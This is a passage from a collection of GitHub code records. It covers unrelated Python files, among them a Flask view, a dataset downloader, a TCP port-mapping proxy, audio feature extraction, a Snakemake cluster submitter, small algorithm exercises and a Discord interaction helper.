render_template(\n 'portal/poly/list.html',\n data={\n # 'vs': vs,\n 'vs': new_vs,\n 'total': total,\n 'query': query,\n 'limit': limit,\n 'page': page,\n 'mine': mine,\n }\n )\n\n\n@app.route('/portal/poly/add')\ndef poly_update_get():\n o = PolyMetric.get(int(request.args.get('poly_id', '0').strip()))\n return render_template('portal/poly/add.html', data={'poly': o})\n\n\n@app.route('/portal/poly/update', methods=['POST'])\ndef poly_update_post():\n poly_id = request.form['poly_id'].strip()\n name = request.form['name'].strip()\n poly_type = request.form['poly_type'].strip()\n counter = request.form['counter'].strip()\n msg = required_chk({\n 'name': name,\n 'poly_type': poly_type,\n 'counter': counter,\n })\n\n if msg:\n return jsonify(msg=msg)\n name = name.split(\"\\n\")\n counter = counter.split(\"\\n\")\n if len(name) == 0 or len(counter) == 0:\n return jsonify(msg=\"name empty or counter empty\")\n res = dict()\n for n in name:\n if not n:\n continue\n\n for c in counter:\n if not c:\n continue\n rr = PolyMetric.save_or_update(\n poly_id,\n n,\n poly_type,\n c,\n g.user.name,\n )\n if rr:\n res[\"name_{}_counter_{}\".format(n, c)] = rr\n if not res:\n return jsonify(msg='')\n return jsonify(msg=str(res))\n # return jsonify(msg=PolyMetric.save_or_update(\n # poly_id,\n # name,\n # poly_type,\n # counter,\n # g.user.name,\n # ))\n\n\n@app.route('/portal/poly/delete/')\ndef poly_delete_get(poly_id):\n poly_id = int(poly_id)\n PolyMetric.delete_one(poly_id)\n return jsonify(msg='')\n","repo_name":"ning1875/falcon-dashboard","sub_path":"rrd/view/portal/poly.py","file_name":"poly.py","file_ext":"py","file_size_in_byte":3770,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"12991148761","text":"from __future__ import annotations\n\nimport logging\nimport os\nfrom pathlib import Path\nfrom typing import Final\n\nimport cv2\nimport requests\n\nDATASET_BASE_URL = \"https://storage.googleapis.com/objectron\"\nLOCAL_DATASET_DIR: Final = Path(os.path.dirname(__file__)) / \"dataset\"\nIMAGE_RESOLUTION: Final = (1440, 1920)\nGEOMETRY_FILENAME: Final = \"geometry.pbdata\"\nANNOTATIONS_FILENAME: Final = \"annotation.pbdata\"\nVIDEO_FILENAME: Final = \"video.MOV\"\n\nAVAILABLE_RECORDINGS = [\n \"bike\",\n \"book\",\n \"bottle\",\n \"camera\",\n \"cereal_box\",\n \"chair\",\n \"cup\",\n \"laptop\",\n \"shoe\",\n]\n\n\ndef ensure_downloaded(src_url: str, dst_path: Path) -> None:\n os.makedirs(dst_path.parent, exist_ok=True)\n if not dst_path.exists():\n logging.info(\"Downloading %s to %s\", src_url, dst_path)\n with requests.get(src_url, stream=True) as req:\n req.raise_for_status()\n with open(dst_path, \"wb\") as f:\n for chunk in req.iter_content(chunk_size=8192):\n f.write(chunk)\n\n\ndef find_path_if_downloaded(recording_name: str, local_dataset_dir: Path) -> Path | None:\n local_recording_dir = local_dataset_dir / recording_name\n paths = list(local_recording_dir.glob(f\"**/{ANNOTATIONS_FILENAME}\"))\n if paths:\n return paths[0].parent\n return None\n\n\ndef get_recording_id_from_name(recording_name: str) -> str:\n recording_ids_raw = requests.get(f\"{DATASET_BASE_URL}/v1/index/{recording_name}_annotations_test\").text\n recording_id = recording_ids_raw.split(\"\\n\")[0]\n return recording_id\n\n\ndef ensure_opencv_version_ok() -> None:\n if cv2.getVersionMajor() == 4 and cv2.getVersionMinor() == 6:\n raise RuntimeError(\n \"\"\"Opencv 4.6 contains a bug which will unpack some videos with the incorrect orientation.\n See: https://github.com/opencv/opencv/issues/22088\n Please upgrade or downgrade as appropriate.\"\"\"\n )\n\n\ndef ensure_recording_downloaded(recording_name: str, dataset_dir: Path) -> Path:\n \"\"\"\n Makes sure the recording is downloaded.\n\n Returns the path to where the dataset is downloaded locally.\n \"\"\"\n ensure_opencv_version_ok()\n\n local_recording_dir = find_path_if_downloaded(recording_name, dataset_dir)\n if local_recording_dir is not None:\n return local_recording_dir\n\n recording_id = get_recording_id_from_name(recording_name)\n local_recording_dir = dataset_dir / recording_id\n recording_url = f\"{DATASET_BASE_URL}/videos/{recording_id}\"\n\n ensure_downloaded(f\"{recording_url}/{VIDEO_FILENAME}\", local_recording_dir / VIDEO_FILENAME)\n ensure_downloaded(f\"{recording_url}/{GEOMETRY_FILENAME}\", local_recording_dir / GEOMETRY_FILENAME)\n ensure_downloaded(\n f\"{DATASET_BASE_URL}/annotations/{recording_id}.pbdata\", local_recording_dir / ANNOTATIONS_FILENAME\n )\n\n return local_recording_dir\n\n\ndef ensure_video_is_split_into_frames(recording_dir: Path, force_reprocess: bool = False) -> None:\n video_path = recording_dir / VIDEO_FILENAME\n frames_dir = recording_dir / \"video\"\n if force_reprocess or not frames_dir.exists():\n logging.info(\"Splitting video at %s into frames in %s\", video_path, frames_dir)\n os.makedirs(frames_dir, exist_ok=True)\n\n vidcap = cv2.VideoCapture(str(video_path))\n success, image = vidcap.read()\n count = 0\n while success:\n cv2.imwrite(f\"{frames_dir}/{count}.jpg\", image)\n success, image = vidcap.read()\n count += 1\n\n\ndef ensure_recording_available(name: str, local_dataset_dir: Path, force_reprocess_video: bool = False) -> Path:\n recording_path = ensure_recording_downloaded(name, local_dataset_dir)\n ensure_video_is_split_into_frames(recording_path, force_reprocess_video)\n return recording_path\n","repo_name":"rerun-io/rerun","sub_path":"examples/python/objectron/download_dataset.py","file_name":"download_dataset.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","stars":3502,"dataset":"github-code","pt":"38"}
+{"seq_id":"5534011403","text":"# -*- coding: utf-8 -*-\n# tcp mapping created by wxk at 2021-12-7\n\nimport sys\nimport socket\nimport logging\nimport threading\n\n\n# 端口映射配置信息\nCFG_REMOTE_IP = '127.0.0.1'\nCFG_REMOTE_PORT = 22\nCFG_LOCAL_IP = '0.0.0.0'\nCFG_LOCAL_PORT = 10086\n\n# 接收数据缓存大小\nPKT_BUFF_SIZE = 2048\n\nlogger = logging.getLogger(\"Proxy Logging\")\nformatter = logging.Formatter('%(name)-12s %(asctime)s %(levelname)-8s %(lineno)-4d %(message)s', '%Y %b %d %a %H:%M:%S',)\n\nstream_handler = logging.StreamHandler(sys.stderr)\nstream_handler.setFormatter(formatter)\nlogger.addHandler(stream_handler)\n\nlogger.setLevel(logging.DEBUG)\n\n# 单向流数据传递\ndef tcp_mapping_worker(conn_receiver, conn_sender):\n while True:\n try:\n data = conn_receiver.recv(PKT_BUFF_SIZE)\n except Exception:\n logger.debug('Connection closed.')\n break\n\n if not data:\n logger.info('No more data is received.')\n break\n\n try:\n conn_sender.sendall(data)\n except Exception:\n logger.error('Failed sending data.')\n break\n\n # logger.info('Mapping data > %s ' % repr(data))\n logger.info('Mapping > %s -> %s > %d bytes.' % (conn_receiver.getpeername(), conn_sender.getpeername(), len(data)))\n\n conn_receiver.close()\n conn_sender.close()\n\n return\n\n# 端口映射请求处理\ndef tcp_mapping_request(local_conn, remote_ip, remote_port):\n remote_conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n try:\n remote_conn.connect((remote_ip, remote_port))\n except Exception:\n local_conn.close()\n logger.error('Unable to connect to the remote server.')\n return\n\n # 这种方式是不行的,为什么会被阻塞呢?\n # tcp_mapping_worker(local_conn, remote_conn)\n # tcp_mapping_worker(remote_conn, local_conn)\n\n threading.Thread(target=tcp_mapping_worker, args=(local_conn, remote_conn)).start()\n threading.Thread(target=tcp_mapping_worker, args=(remote_conn, local_conn)).start()\n\n return\n\n# 端口映射函数\ndef tcp_mapping(remote_ip, remote_port, local_ip, local_port):\n local_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n local_server.bind((local_ip, local_port))\n local_server.listen(5)\n\n logger.debug('Starting mapping service on ' + local_ip + ':' + str(local_port) + ' ...')\n\n while True:\n try:\n (local_conn, local_addr) = local_server.accept()\n except Exception:\n local_server.close()\n logger.debug('Stop mapping service.')\n break\n\n threading.Thread(target=tcp_mapping_request, args=(local_conn, remote_ip, remote_port)).start()\n\n logger.debug('Receive mapping request from %s:%d.' % local_addr)\n\n return\n\n# 主函数\nif __name__ == '__main__':\n tcp_mapping(CFG_REMOTE_IP, CFG_REMOTE_PORT, CFG_LOCAL_IP, CFG_LOCAL_PORT)","repo_name":"xk-wang/myfrp","sub_path":"pytest/frpctest.py","file_name":"frpctest.py","file_ext":"py","file_size_in_byte":2904,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"38"}
+{"seq_id":"5533801583","text":"# flake8: noqa\nimport os.path as osp\nimport pathlib\n\nfrom yanerf.utils.config import Config\nfrom yanerf.utils.registry import Registry\n\nTRAINER = Registry(\"Trainer\")\n\n\n@TRAINER.register_module()\nclass MyTrainer:\n def __init__(self, lr: int, epochs: int) -> None:\n self.lr = lr\n self.epochs = epochs\n\n\ndef test_builder():\n cfg = Config.fromfile(osp.join(osp.dirname(__file__), \"configs/test_utils_config.yml\"))\n trainer = TRAINER.build(cfg.trainer)\n print(f\"\\nMY CFG: {cfg.pretty_text}\")\n print(trainer.__dict__)\n","repo_name":"xk-huang/yet-another-nerf","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"38"}
+{"seq_id":"9191816978","text":"from snakemake.utils import read_job_properties\nimport sys\nimport subprocess as sp\nimport json\ncluster_json_file =sys.argv[1]\njobscript = sys.argv[2]\ncustom_config_rules = ['job_to_bundle']\nwith open(cluster_json_file) as j:\n cluster_json = json.load(j)\n#%%\n\nparams = cluster_json['__default__']\njob_properties = read_job_properties(jobscript)\nrule = job_properties['rule']\nif rule in cluster_json:\n for key in cluster_json[rule]:\n params[key] = cluster_json[rule][key]\nelif rule in custom_config_rules:\n # specifify custom configureations specific rules\n print(rule)\n if rule == 'job_to_bundle':\n print(job_properties)\n if job_properties['wildcards']['wc'] == 'Q':\n params = cluster_json['__default__'] \n else:\n outdir = 'script_temp'\n ec_strings = [f\"{key}={job_properties['wildcards'][key]}\" for key in job_properties['wildcards'] ]\n ec_strings = '-'.join(ec_strings)\n output = f'{ec_strings}.{rule}.sh'\n sp.run(f\"grep -v '#!/bin/sh' {jobscript} > {outdir}/{output}\", shell=True)\n sys.exit()\n \nelse:# use default parameters\n params = cluster_json['__default__'] \n\nsbcmd=f'''sbatch --cpus-per-task={params['cpus-per-task']} \\\n --mem={params['mem']} \\\n --time={params['time']} \\\n --job-name={rule} \\\n --partition={params['partition']} \\\n --output=00log/{rule}.out \\\n --error=00log/{rule}.err \\\n {params['extra']} \\\n {jobscript}\n\n'''\nsp.run(sbcmd, shell=True)\n\n\n","repo_name":"vinay-swamy/Snakemake-Horizontal-RuleGroup","sub_path":"cluster-config.py","file_name":"cluster-config.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"42602892030","text":"def solution(jobs):\n cnt = 0\n time = 0\n realtime = 0\n que = []\n x = len(jobs)\n jobs.sort(key=lambda x : x[0])\n\n while cnt < x:\n\n while jobs and jobs[0][0]<=time:\n a, b = jobs.pop(0)\n que.append([a, b])\n que.sort(key = lambda x : x[1])\n if que:\n c, d = que.pop(0)\n time += d\n realtime += time-c\n cnt += 1\n else:\n time += 1\n\n answer = realtime//x\n\n return answer\n\nprint(solution([[0, 3], [1, 9], [2, 6]]\t))","repo_name":"kimss373/solvealgorithm","sub_path":"프로그래머스/디스크 컨트롤러.py","file_name":"디스크 컨트롤러.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"12904245629","text":"from kafka import KafkaConsumer\nimport json\n\n\nclass ConsumerServer(KafkaConsumer):\n def __init__(self, topic_name):\n self.consumer = KafkaConsumer(\n bootstrap_servers=\"localhost:9092\",\n request_timeout_ms=1000,\n auto_offset_reset=\"earliest\",\n max_poll_records=10\n )\n self.consumer.subscribe(topics=topic_name)\n\n def consume(self):\n while True:\n for metadata, consumer_record in self.consumer.poll().items():\n if consumer_record is not None:\n for record in consumer_record:\n print(json.loads(record.value))\n else:\n print(\"no message\")\n\n\nif __name__ == \"__main__\":\n consumer = ConsumerServer(\"calls\")\n consumer.consume()","repo_name":"amaralunao/SF-Crime-Statistics","sub_path":"consumer_server.py","file_name":"consumer_server.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"13466818863","text":"from typing import List\nfrom bisect import bisect_right\nfrom collections import deque\n\n\ndef main():\n def findClosestElements(arr: List[int], k: int, x: int) -> List[int]:\n index = bisect_right(arr, x)\n left, right = index - 1, index\n res = deque()\n for _ in range(k):\n left_val = x - arr[left] if 0 <= left < len(arr) else float('inf')\n right_val = arr[right] - x if 0 <= right < len(arr) else float('inf')\n if left_val <= right_val:\n res.appendleft(arr[left])\n left -= 1\n else:\n res.append(arr[right])\n right += 1\n return list(res)\n\n arr = [1, 2, 3, 4, 5]\n k, x = 4, 3\n print(findClosestElements(arr, k, x))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"sanchit-g/DSA-practice-codes","sub_path":"k_closest_elements.py","file_name":"k_closest_elements.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"21023241221","text":"import librosa\nimport librosa.display\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport os\nimport pandas as pd\nimport random\n\nmatplotlib.use('Agg')\n\nclass Loader:\n\n def __init__(self, sample_rate, mono): # offset being time_start and duration is the window_size(seconds)\n self.sample_rate = sample_rate\n self.mono = mono\n\n def load(self, file_path, offset, time_end):\n duration = time_end - offset\n signal, sr = librosa.load(file_path, offset=offset, duration=duration, mono=self.mono, res_type=\"kaiser_fast\")\n return signal, sr\n \n def get_sample(self, signal, offset, time_end, original_sample_rate):\n offset_samples = offset * original_sample_rate\n duration_samples = (time_end - offset) * original_sample_rate\n return signal[offset_samples:offset_samples + duration_samples]\n \n def resample(self, signal, original_sr):\n if self.sample_rate != original_sr:\n signal = librosa.resample(signal, original_sr, self.sample_rate, res_type=\"kaiser_best\")\n return signal\n\nclass Padder: #\n def __init__(self, num_expected_samples, mode = \"constant\"):\n self.num_expected_samples = num_expected_samples\n self.mode = mode\n\n def is_padding_needed(self, len_arr):\n return True if self.num_expected_samples > len_arr else False\n\n def pad(self, array): # padding on the end of the original array\n if self.is_padding_needed(len(array)):\n num_missing_samples = self.num_expected_samples - len(array)\n array = np.pad(array, (0, num_missing_samples), mode=self.mode)\n return array\n\n\nclass MelSpecExtractor:\n\n def __init__(self, sample_rate):\n self.sample_rate = sample_rate\n\n def extract(self, signal):\n mel_signal = librosa.feature.melspectrogram(y=signal, sr=self.sample_rate)[:-1]\n spectogram = np.abs(mel_signal)\n log_spec = librosa.amplitude_to_db(spectogram, ref = np.max)\n return log_spec\n\nclass MFCCExtractor:\n\n def __init__(self, sample_rate):\n self.sample_rate = sample_rate\n\n def extract(self, signal):\n mfccs_features = librosa.feature.mfcc(y=signal, sr=self.sample_rate, n_mfcc=40)\n #in order to find out scaled feature we do mean of transpose of value\n return mfccs_features\n\nclass Saver:\n\n def __init__(self, feature_save_dir):\n self.feature_save_dir = feature_save_dir\n\n def save_feature(self, feature, file_path, offset, time, label,type):\n save_path = self._generate_save_path(file_path, label, offset, time, type)\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.axes.get_xaxis().set_visible(False)\n ax.axes.get_yaxis().set_visible(False)\n ax.set_frame_on(False)\n librosa.display.specshow(feature, x_axis=\"time\", y_axis=\"mel\")\n plt.savefig(save_path, bbox_inches='tight', pad_inches = 0)\n plt.clf()\n plt.close(\"all\")\n\n def _generate_save_path(self, file_path, label, offset, time, type):\n ending_str = \"_{}_{}\".format(offset, time)\n file_name = os.path.split(file_path)[1][:-4]\n #save_path = self.feature_save_dir+ type+ label +\"/\" + file_name + ending_str + \"_augmented.png\"\n save_path = file_name + ending_str + \"_augmented.png\"\n return save_path\n\n\n\nclass DataAugmentation:\n\n def __init__(self, sr):\n self.sr = sr\n \n\n def add_white_noise(self, signal, noise_percentage_factor = 0.1):\n noise = np.random.normal(0, signal.std(), signal.size)\n augmented_signal = signal + noise * noise_percentage_factor\n return augmented_signal\n \n def random_gain(self, signal, min_factor=0.1, max_factor=0.12):\n gain_rate = random.uniform(min_factor, max_factor)\n augmented_signal = signal * gain_rate\n return augmented_signal\n \n def time_strecth(self, signal, strech_rate = 0.4):\n return librosa.effects.time_stretch(signal, strech_rate)\n \n def pitch_scale(self, signal, num_semitones = 2):\n return librosa.effects.pitch_shift(signal, self.sr, num_semitones)\n\nclass MinMaxNormaliser:\n\n def __init__(self, min_val, max_val):\n self.min = min_val\n self.max = max_val\n\n def normalise(self, array):\n a = (array - array.min())\n b = (array.max() - array.min())\n norm_array = np.divide(a, b, out=np.zeros_like(a), where=b!=0)\n norm_array = norm_array * (self.max - self.min) + self.min\n return norm_array\n\nclass PreProcessingPipeline:\n\n def __init__(self, loader, padder, feature_extractor, saver, normaliser, data_augmentation):\n self.loader = loader\n self.padder = padder\n self.feature_extractor = feature_extractor\n self.normaliser = normaliser\n self.saver = saver\n self.data_augmentation = data_augmentation\n self.current_file = None\n self.current_signal = None\n self.current_sr = None\n\n def _process_file(self, file_path, offset, time_end,label, type):\n signal,sr = self.loader.load(file_path, offset, time_end)\n signal = self.loader.resample(signal, sr)\n signal = self.padder.pad(signal)\n augmentation = random.randint(0,1)\n feature_orig = self.feature_extractor.extract(signal)\n feature_orig = self.normaliser.normalise(feature_orig)\n feature_pitch = self.feature_extractor.extract(self.data_augmentation.pitch_scale(signal))\n feature_pitch = self.normaliser.normalise(feature_pitch)\n feature_time_streched = self.feature_extractor.extract(self.data_augmentation.time_strecth(signal))\n feature_time_streched = self.normaliser.normalise(feature_time_streched)\n return feature_orig, feature_pitch, feature_time_streched\n # if augmentation == 0:\n # signal = self.data_augmentation.pitch_scale(signal)\n # else:\n # signal = self.data_augmentation.add_white_noise(signal)\n \n # feature = self.feature_extractor.extract(signal)\n # feature = self.normaliser.normalise(feature)\n #feature = feature[..., np.newaxis]\n #self.saver.save_feature(feature, file_path, offset, time_end, label, type)\n\n def process(self, dataframe, type):\n for row in dataframe.itertuples():\n try:\n self._process_file(row.File_path, row.Time_start, row.Time_end, row.Label, type)\n except:\n print(row.File_path, row.Time_start, row.Time_end)\n continue\n\n\nif __name__ == \"__main__\":\n DURATION = 3\n SAMPLE_RATE = 22050\n NUM_EXPECTED_SAMPLES = DURATION * SAMPLE_RATE\n MONO = True\n\n FEATURE_SAVE_DIR = \"mel_augment/\"\n RANDOM_FILE = r\"D:\\Projects\\DL_Violence_Pytorch\\fs\\datasets\\av\\dataset_main\\Hanau02\\i3\\Hanau02_i3_026_center_top_wav_audio_ros.wav\"\n\n \n loader = Loader(SAMPLE_RATE, MONO)\n padder = Padder(NUM_EXPECTED_SAMPLES)\n mel_extractor = MelSpecExtractor(SAMPLE_RATE)\n min_max_normaliser = MinMaxNormaliser(0, 1)\n mfcc_extractor = MFCCExtractor(SAMPLE_RATE)\n saver = Saver(FEATURE_SAVE_DIR)\n data_augmentation = DataAugmentation(SAMPLE_RATE)\n pipeline = PreProcessingPipeline(loader, padder, mel_extractor, saver, min_max_normaliser, data_augmentation)\n #feature = pipeline._process_file(RANDOM_FILE, 52, \"violent\", \"training/\")\n\n","repo_name":"EduardoGit-1/DL-based-algorithm-for-violence-detection-in-audio-data","sub_path":"additional_tests/mel_augment/mel.py","file_name":"mel.py","file_ext":"py","file_size_in_byte":7360,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"3699361526","text":"from reportlab.platypus import SimpleDocTemplate, Paragraph, Spacer\nfrom reportlab.lib.styles import getSampleStyleSheet\nfrom reportlab.lib.units import inch\nfrom reportlab.lib.pagesizes import A4\n\n\nstyles = getSampleStyleSheet()\n\nTitle = \"Hello World\"\npageinfo = \"Página\"\n\n\ndef myfirstpage(canvas, doc):\n canvas.saveState()\n canvas.setFont(psfontname=\"Times-Bold\", size=16)\n canvas.drawCentredString(x=3*inch, y=10*inch, text=Title)\n canvas.setFont(psfontname=\"Times-Roman\", size=9)\n canvas.drawString(x=1*inch, y=0.75*inch, text=\"Introdução\")\n canvas.restoreState()\n\n\ndef mylaterpages(canvas, doc):\n canvas.saveState()\n canvas.setFont(psfontname=\"Times-Roman\", size=9)\n canvas.drawString(x=1*inch, y=0.75*inch, text=pageinfo)\n canvas.drawString(x=1.5*inch, y=0.75*inch, text=str(canvas.getPageNumber()))\n canvas.restoreState()\n\n\ndef go():\n doc = SimpleDocTemplate(filename=\"platypus_intro.pdf\", pagesize=A4, title=\"Lista\")\n story = [Spacer(1, 2*inch)]\n style = styles[\"Normal\"]\n for i in range(20):\n bogustext = (\"This is Paragraph number %s \" % i) * 10\n paragrafo = Paragraph(bogustext, style)\n story.append(paragrafo)\n story.append(Spacer(width=1, height=0.2*inch))\n\n doc.build(flowables=story, onFirstPage=myfirstpage, onLaterPages=mylaterpages)\n\n return doc\n\n\nif __name__ == '__main__':\n go()\n","repo_name":"jeancharlles/reportpdf","sub_path":"platypus/platypus_intro.py","file_name":"platypus_intro.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"18239540447","text":"#!/usr/bin/python\n#standard imports\nimport sys\n\nk = int(sys.argv[1]) #read first input as k size of kmers\nwith open(sys.argv[2]) as f: #read input file, remove new line character and concatenate lines\n file = \"\".join(line.strip() for line in f.readlines()[1:])\nkmers, bases = list(), tuple(list('ATGC'))\ndef generate_kmers(dna_tup: tuple, kmers: list, k: int)-> dict:\n \"\"\" method to generate all possible combinations of kmers from dna bases\n :param dna_tup: tuple of dna bases\n :param kmers: a list containing combinations\n :param k: k-mer size from user input\n :return: k-mer combinations dictionary\n \"\"\"\n while k:\n kmers = [i + list(j) for i in kmers for j in dna_tup]\n return generate_kmers(dna_tup=dna_tup, kmers=kmers, k=k-1)\n return dict.fromkeys([''.join(x) for x in kmers],0)\nkmer_dict = generate_kmers(dna_tup=bases, kmers=[kmers], k=k) #create dictionary with kmers as keys\nfor key in kmer_dict.keys(): #to find number of occurrences of kmers in fasta read file, insert as values to dict\n if key in file: kmer_dict[key] = sum([1 for i in range(0,len(file)-len(key)+1) if file[i:i+len(key)] == key ])\n[print(key,'\\t',kmer_dict[key]) for key in sorted(kmer_dict.keys()) if kmer_dict[key]][0] #print stdout","repo_name":"rbr7/bioinformatics_courses","sub_path":"prog_bioinformatics/solved_bioinfo_algos/kmer_counter.py","file_name":"kmer_counter.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"71744951150","text":"from math import sqrt\r\nfrom sympy import *\r\nfrom tkinter import Tk, Label, Button, Entry, Frame\r\n\r\nclass Uncert_Calc:\r\n def __init__(self, master):\r\n self.master = master\r\n master.title('Uncertainty Propagation Calc')\r\n master.iconbitmap('favicon.ico')\r\n\r\n self.frame = Frame()\r\n self.frame.grid(padx=20, pady=20)\r\n\r\n #instantiate widgets\r\n self.formula_label = Label(self.frame, text='Enter Formula: ')\r\n self.formula_entry = Entry(self.frame)\r\n self.submit_formula = Button(self.frame, text='Continue', command=self.generateEntries)\r\n \r\n self.answer_label = Label(self.frame, text='')\r\n\r\n #show widgets\r\n self.formula_label.grid(row=0)\r\n self.formula_entry.grid(row=0, column=1)\r\n self.submit_formula.grid(row=0, column=2, padx=10)\r\n\r\n self.variables = [] #symbols in function\r\n self.values = [] #values of the symbols\r\n self.uncertainties = [] #uncertainties of those values\r\n self.subsitutions = [] #for subs() sympy function\r\n self.entries = [] #generated entries\r\n #special functions\r\n self.special_2 = ('ln')\r\n self.special_3 = ('cos','sin','tan','sec','csc','cot','log')\r\n self.special_4 = ('acos','asin','atan','asec','acsc','acot')\r\n\r\n def generateEntries(self):\r\n #clear any existing entries, and the rest of the lists\r\n del self.entries[:]\r\n del self.variables[:]\r\n del self.values[:]\r\n del self.uncertainties[:]\r\n del self.subsitutions[:]\r\n \r\n for widget in self.frame.grid_slaves(): #grid_slaves() returns all widgets in grid\r\n if int(widget.grid_info()['row']) > 0:\r\n widget.grid_forget()\r\n\r\n #get formula\r\n funct = self.formula_entry.get()\r\n i = 0\r\n while i < len(funct): #determine variables in function\r\n if funct[i:i+2] in self.special_2:\r\n i+=2\r\n elif funct[i:i+3] in self.special_3:\r\n i+=3\r\n elif funct[i:i+4] in self.special_4:\r\n i+=4\r\n if funct[i].isalpha() and funct[i] not in self.variables:\r\n self.variables.append(funct[i])\r\n i+=1\r\n \r\n #create entries\r\n i=1 #row number\r\n for variable in self.variables: #set variables as symbols in sympy, create values and uncertanties list\r\n var(variable)\r\n Label(self.frame, text=\"Enter the value and uncertainty for '\" + variable +\"': '\").grid(row=i)\r\n entry = Entry(self.frame)\r\n entry.grid(row=i, column=1)\r\n self.entries.append(entry)\r\n i+=1\r\n \r\n #submit button and view answer\r\n submit = Button(self.frame,text='Submit',command=lambda: self.calcUncert(funct))\r\n submit.grid(row=i,padx=10,pady=10)\r\n\r\n def calcUncert(self,f):\r\n funct = f\r\n sumR = 0\r\n \r\n del self.uncertainties[:]\r\n del self.values[:]\r\n \r\n for entry in self.entries:\r\n val_uncert=entry.get().split()\r\n self.values.append(float(val_uncert[0]))\r\n self.uncertainties.append(float(val_uncert[1]))\r\n\r\n for j in range(len(self.variables)): #create subsitutions list\r\n self.subsitutions.append((self.variables[j], self.values[j]))\r\n for i in range(0,len(self.values)): #calculate propogated uncertainty\r\n sumR += (diff(funct, self.variables[i]).subs(self.subsitutions) * self.uncertainties[i])**2\r\n result = sympify(funct).subs(self.subsitutions)\r\n self.answer_label['text'] = 'Answer: ' + str(round(result,3)) + ' +/- ' + str(round(sqrt(sumR),3))\r\n self.answer_label.grid(row=self.frame.grid_size()[1]-1, column=1)\r\n\r\n#run gui \r\nroot = Tk()\r\ngui = Uncert_Calc(root)\r\nroot.mainloop()\r\n","repo_name":"igullickson/PyUncertaintyCalc","sub_path":"main.pyw","file_name":"main.pyw","file_ext":"pyw","file_size_in_byte":3894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"22496799005","text":"import random\n\ndef keygen():\n key_list = []\n while True:\n #Try to get a good mix of short and long numbers for variety.\n mix = random.randint(1,100)\n if mix % 2 == 0:\n n = random.randint(100,1000)\n else:\n n = random.randint(100000,900000)\n \n isPrime = True\n\n #Check to see if any other number will divide evenly.\n for num in range(2, n):\n if n % num == 0:\n isPrime = False\n break\n\n #Check to see if its prime and length modulo 3 equals 0. \n if isPrime and (len(str(n)) % 3 == 0):\n key_list.append(n)\n\n #Just generate 10 of these.\n if len(key_list) == 10:\n break\n return key_list\n\nkey_list = keygen()\n\nprint('Generated Keys (10): ')\n\nfor p in key_list:\n print(p)\n","repo_name":"xd43D41U5x/CrackMe_Challenges","sub_path":"week_6/keygen.py","file_name":"keygen.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"6280368196","text":"# exercise 2: calculate body mass index\nweight = input(\"enter your weight in kg: \")\nheight = input(\"enter your height in m: \")\n\nfbmi = float(weight) / (float(height) ** 2)\nibmi = round(fbmi, 2)\n\nprint(f\"Your BMI is {ibmi} \")\n\nif ibmi <= 18.5:\n print(\"Your are UNDERWEIGHT.\")\nelif ibmi <= 25:\n print(\"You are NORMAL WEIGHT.\")\nelif ibmi <= 30:\n print(\"You are OVERWEIGHT.\")\nelif ibmi <= 35:\n print(\"You are OBESED.\")\nelse:\n print(\"You are CLINICALLY OBESED.\")","repo_name":"tasha-olivia/pythonCourse","sub_path":"python 100/day 2/exercise2_bmi.py","file_name":"exercise2_bmi.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"690994641","text":"from typing import Union\n\nfrom classes.response import InteractionResponse, InteractionCallbackData, InteractionCallbackType, InteractionCallbackDataFlags\n\nfrom classes.member import Member\nfrom classes.user import User\n\nfrom classes.components import ActionRow, Button, SelectMenu\n\n\nclass Context:\n def __init__(self, interaction_type, http, interaction):\n self._acked = False\n\n self.type = interaction_type\n\n self.http = http\n self.interaction = interaction\n self.interaction_id = int(interaction['id'])\n self.application_id = int(interaction['application_id'])\n self.interaction_token = interaction['token']\n\n @property\n def guild_id(self) -> int:\n return int(self.interaction['guild_id']) if 'guild_id' in self.interaction else None\n\n @property\n def channel_id(self) -> int:\n return int(self.interaction['channel_id']) if 'channel_id' in self.interaction else None\n\n @property\n def author(self) -> Union[Member, User]:\n return Member(self.interaction['member']) if 'member' in self.interaction else User(self.interaction['user'])\n\n @property\n def message(self) -> dict:\n return self.interaction['message'] if 'message' in self.interaction else None\n\n async def respond(self, content=None, embeds=None, ephemeral=False, components=None):\n if ephemeral:\n ephemeral = InteractionCallbackDataFlags.EPHEMERAL.value\n else:\n ephemeral = 0\n if components:\n if isinstance(components, ActionRow):\n components = [components.to_json()]\n elif isinstance(components, Button) or isinstance(components, SelectMenu):\n row = ActionRow()\n row.add_components(components)\n components = [row]\n else:\n rows = []\n row = ActionRow()\n for i, component in enumerate(components):\n if i % 5 == 0 and i != 0:\n rows.append(row)\n 